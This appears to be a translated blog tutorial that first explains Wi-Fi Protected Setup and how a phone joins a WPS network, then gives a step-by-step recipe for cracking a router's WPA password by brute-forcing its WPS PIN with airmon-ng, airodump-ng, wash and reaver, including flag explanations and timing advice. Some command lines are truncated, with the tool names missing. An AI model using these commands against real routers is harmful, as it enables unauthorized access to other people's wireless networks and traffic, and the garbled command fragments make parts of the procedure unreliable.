1. WPS Authentication Mechanism
WPS (Wi-Fi Protected Setup; some vendors call it AOSS or QSS, but the function is the same) is a certification program run by the Wi-Fi Alliance that focuses on simplifying the installation and security configuration of a WLAN. Traditionally, a user creating a new wireless network must manually set the network name (SSID) and security key on the access point, and then enter the key on the client side, to keep intruders out. The whole process requires background knowledge of Wi-Fi devices and the ability to change the necessary configuration. Wi-Fi Protected Setup automatically sets the network name (SSID) and configures strong WPA encryption and authentication; the user simply enters a personal identification number (the PIN method) or presses a button (push-button configuration, or PBC) to connect securely to the WLAN. This greatly simplifies wireless security setup. Wi-Fi Protected Setup is supported by many Wi-Fi certified 802.11 products, including access points, wireless adapters, Wi-Fi phones, and other consumer electronic devices.
WPS helps client users automatically configure the network name (SSID) and the wireless encryption key. Ordinary users do not need to understand the concepts of SSID and security key to get a secure connection, and the user's security key cannot be cracked by outsiders, because it is randomly generated. Most importantly, users do not have to remember a lengthy wireless encryption password, which avoids the trouble of forgetting it.
- WPS Certified AP Operating Instructions
1. An AP that supports WPS generally has a button. After the button is pressed, the AP waits for a client device to connect for a certain time (usually 120 s). The web management interface offers the same operation; either one can be used.
2. Press the WPS connection button (called QSS, AOSS, etc. on some devices) on the network card to connect to the AP. (You can also connect by entering a PIN code; this requires the corresponding settings on the AP.)
3. The wireless network card and the WPS-certified AP establish the connection.
[Figure: schematic of the WPS connection procedure]
2. WiFi authentication process with the WPS mechanism
- Not all phone models and ROMs support connecting to WPS-certified networks. Taking the K-Touch W806 (Bumblebee), which does support it, as an example, here is how a phone connects using WPS.
Under "Settings" > "Wireless and Network" > "WLAN settings" there is an option to add a WPS network. Tapping it offers two access methods: one is to enter the PIN code, the other is to press the button.
After the connection is successful, the router (AP) management page appears as follows:
Use Wireshark for analysis. By setting a filter, you can see the general process of the WPS authentication connection.
Drawn as a flowchart, the approximate process is as follows:
3. WiFi Password cracking process
Open a terminal and enter "ifconfig wlan0 up" to bring up the USB wireless card.
ifconfig wlan0 up
Next, "airmon-ng start wlan0" activates monitor mode; the monitor interface is mon0.
airmon-ng start wlan0
Note: the name wlan0 is not fixed; if you plug in another USB card, the system will automatically name it wlan1, wlan2, and so on. The USB card must be supported by the system. The RTL8187 series is recommended; in my own testing it works and is stable.
View information about the surrounding APs. Record the MAC address of the target router.
airodump-ng mon0
Special note: the PIN method can recover the PSK password only if the AP has WPS (QSS) enabled!
Use the wash command to view the properties of the surrounding wireless networks; the C is uppercase. A "WPS Locked" column is displayed.
-i -C
Capture the PIN exchange and enumerate PIN codes
-i -b -a -S -vv
Note:
The colons in the MAC address cannot be omitted; the letters of the MAC address may be upper or lower case; -S is a capital letter; -vv is two v's, not a w!
-i the name of the monitoring interface
-b the MAC address of the target
-a automatically detect the optimal configuration for the target AP
-S use a minimal DH key (can improve cracking speed)
-vv show more non-critical warnings
-d the delay, set to 1 second per attempt
-t the timeout, the maximum time to wait for a response each time
-c specify the channel so the signal is found easily, for example -c1 for channel 1; change it to match the channel of your target
(For non-TP-Link routers the -d9 -t9 parameters are recommended to keep the router from hanging:
reaver -i mon0 -b MAC -a -S -d9 -t9 -vv)
The rest is a long wait; be patient!